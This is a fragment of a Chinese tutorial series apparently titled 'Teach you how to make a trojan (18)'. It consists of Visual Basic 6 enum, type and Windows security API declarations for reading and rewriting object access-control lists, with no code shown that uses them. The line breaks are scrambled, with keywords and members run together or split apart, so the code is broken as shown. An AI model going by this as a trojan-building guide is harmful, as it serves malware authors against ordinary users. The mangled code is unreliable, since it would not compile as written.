教你如何做木马(18)

主要是讲解木马的危险和系统安全

Enum

TRUSTEE_TYPE TRUSTEE_IS_UNKNOWN TRUSTEE_IS_USER TRUSTEE_IS_GROUP End

Enum Private Type TRUSTEE pMultipleTrustee

As Long MultipleTrusteeOperation

As MULTIPLE_TRUSTEE_OPERATION TrusteeForm

As TRUSTEE_FORM TrusteeType

As TRUSTEE_TYPE ptstrName

As String End Type Private Type EXPLICIT_ACCESS grfAccessPermissions

As Long grfAccessMode

As ACCESS_MODE grfInheritance

As Long TRUSTEE

As TRUSTEE End Type

Private Type AceArray List() As EXPLICIT_ACCESS End Type Private Enum

SE_OBJECT_TYPE SE_UNKNOWN_OBJECT_TYPE = 0

SE_FILE_OBJECT

SE_SERVICE

SE_PRINTER

SE_REGISTRY_KEY

SE_LMSHARE

SE_KERNEL_OBJECT

SE_WINDOW_OBJECT

SE_DS_OBJECT

SE_DS_OBJECT_ALL

SE_PROVIDER_DEFINED_OBJECT

SE_WMIGUID_OBJECT End Enum

Private Declare Function SetSecurityInfo Lib "advapi32.dll" (ByVal Handle As Long, ByVal ObjectType

As SE_OBJECT_TYPE, ByVal SecurityInfo As Long, ppsidOwner As Long, ppsidGroup As Long, ppDacl

As Any, ppSacl As Any) As Long

Private Declare Function GetSecurityInfo Lib "advapi32.dll" (ByVal Handle As Long, ByVal ObjectType

As SE_OBJECT_TYPE, ByVal SecurityInfo As Long, ppsidOwner As Long, ppsidGroup As Long, ppDacl

As Any,

ppSacl As Any, ppSecurityDescriptor As Long) As Long Private Declare Function SetEntriesInAcl Lib "advapi32.dll" Alias "SetEntriesInAclA" (ByVal

cCountOfExplicitEntries As Long, pListOfExplicitEntries As EXPLICIT_ACCESS, ByVal OldAcl As

Long, NewAcl As Long) As Long

Private Declare Sub BuildExplicitAccessWithName Lib "advapi32.dll" Alias

"BuildExplicitAccessWithNameA" (pExplicitAccess As EXPLICIT_ACCESS, ByVal pTrusteeName As

String, ByVal AccessPermissions As Long, ByVal AccessMode As ACCESS_MODE, ByVal Inheritance As

Long)

Private Declare Sub RtlInitUnicodeString Lib "NTDLL.DLL" (DestinationString As UNICODE_STRING,

ByVal SourceString As Long)